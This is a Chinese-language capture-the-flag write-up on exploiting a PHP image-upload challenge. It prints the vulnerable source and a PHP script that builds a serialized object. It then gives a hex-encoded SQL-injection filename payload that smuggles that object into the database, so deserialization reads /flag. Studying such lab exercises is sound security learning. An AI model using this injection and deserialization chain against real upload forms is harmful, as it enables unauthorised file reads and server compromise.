传传传,各种传
*1*|***1*** 文件上传
1.MIME 类型检测绕过
设置为 image/jpeg,无果
2. 黑名单绕过
尝试设置后缀如 php3,php5, 无果
3.%00 截断
尝试,无果。
4. 应用程序解析绕过
.php.jpg。上传成功!
发现怎么后缀是 jpg,然后通过路径访问的话报 404,这里我就开始奇怪了,难道真的不是文件上传,毕竟就算上传成功也需要爆出路径才能利用,但是这明显是假路径。
思考其他的方向,既然 buu 给了 github 源码,那就看看源码吧,看了看,主要逻辑代码在 helper.php
*1*|***2*** 代码审计
<?php
class helper {
protected $folder = "pic/";
protected $ifview = False;
protected $config = "config.txt";
// The function is not yet perfect, it is not open yet.
public function upload($input="file")
{
$fileinfo = $this->getfile($input);
$array = array();
$array["title"] = $fileinfo['title'];
$array["filename"] = $fileinfo['filename'];
$array["ext"] = $fileinfo['ext'];
$array["path"] = $fileinfo['path'];
$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
$array["attr"] = serialize($my_ext);
$id = $this->save($array);
if ($id == 0){
die("Something wrong!");
}
echo "<br>";
echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
}
public function getfile($input)
{
if(isset($input)){
$rs = $this->check($_FILES[$input]);
}
return $rs;
}
public function check($info)
{
$basename = substr(md5(time().uniqid()),9,16);
$filename = $info["name"];
$ext = substr(strrchr($filename, '.'), 1);
$cate_exts = array("jpg","gif","png","jpeg");
if(!in_array($ext,$cate_exts)){
die("<p>Please upload the correct image file!!!</p>");
}
$title = str_replace(".".$ext,'',$filename);
return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
}
public function save($data)
{
if(!$data || !is_array($data)){
die("Something wrong!");
}
$id = $this->insert_array($data);
return $id;
}
public function insert_array($data)
{
$con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
if (mysqli_connect_errno($con))
{
die("Connect MySQL Fail:".mysqli_connect_error());
}
$sql_fields = array();
$sql_val = array();
foreach($data as $key=>$value){
$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
}
$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
mysqli_query($con, $sql);
$id = mysqli_insert_id($con);
mysqli_close($con);
return $id;
}
public function view_files($path){
if ($this->ifview == False){
return False;
//The function is not yet perfect, it is not open yet.
}
$content = file_get_contents($path);
echo $content;
}
function __destruct(){
# Read some config html
$this->view_files($this->config);
}
}
?>
这里懂了两个文件的内容
upload.php:
上传页面,包括了 helper.php ,序列化图片的内容并存在数据库中。
helper.php:
反序列化数据库中的内容,输出图片内容
所以我们的核心思路:
将危险代码通过序列化存在数据库中,在反序列化的过程后,通过某些函数执行危险代码
这里一定可以存入数据库,否则我们在前端无法利用,所以数据库的语句一定有漏洞,只要想好怎么利用就可以
大概看看代码,在 view_files 函数里存在文件读取,那么就按照他的来,
构造 ifview==True,content=/flag
*1*|***3*** 编写 exp
<?php
class helper {
protected $ifview = True;
protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
?>
序列化得出
O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
因为两个属性是 public,所以字段名前面加上 \0*\0 的前缀
*1*|***4***sql 注入
然后思路是想看到 sql 语句,其中应该可以插入危险代码,导致 sql 注入。那么我们先找到 SQL 语句:
INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")
追溯函数:
implode(",",$sql_fields:
用逗号组合 sql_fields$sql_fields[] = "“.$key_temp.”";
反引号中间包含 str_replace (chr (0).’*’.chr (0), ‘\0\0\0’, $key);$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
替换后的 key
4. foreach($data as $key=>$value)
data 的键数组
看看 pop 链:
insert_array->save->upload
最终也就是 array 数组中的内容,即是我们上传的图片的各项参数。那我们能控制的也就是图片的图片名,然后发现 title 就是去掉后缀的 filename。看到 check 函数返回的内容就懂了。
return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
我们按照此格式上传刚刚序列化后的内容,该代码先经过序列化,然后存入数据库中,后端将其从数据库中取出,反序列化,触发析构函数,读取 flag 内容
然后看到代码中在序列化和反序列化时对 protected 属性进行了过滤,所以我们不能直接传入 \0*\0 的前缀。需要按照他的传入 \0\0\0,经过处理后我们为需要的内容。
O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}
因为不能使用双引号,所以我们 hex。
构造文件名:
filename="a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png"
(需要用 #注释掉后面的内容,当然不用 #注释,按照他的格式再往后核实也可以)
burpsuite 抓包,先传一个图片,更改内容为上面的值,上传成功,访问 show.php,获取 flag
*1*|***5*** 总结思路
- 源码泄露,获得源码
- 代码审计,一个序列化传进数据库,一个反序列化从数据库取出
- 构造危险代码 -> 匹配成功传入数据库 -> 反序列化出内容 -> 通过相关函数获取 flag
*1*|***6*** 知识点
- 信息泄露
- sql 注入
- 反序列化
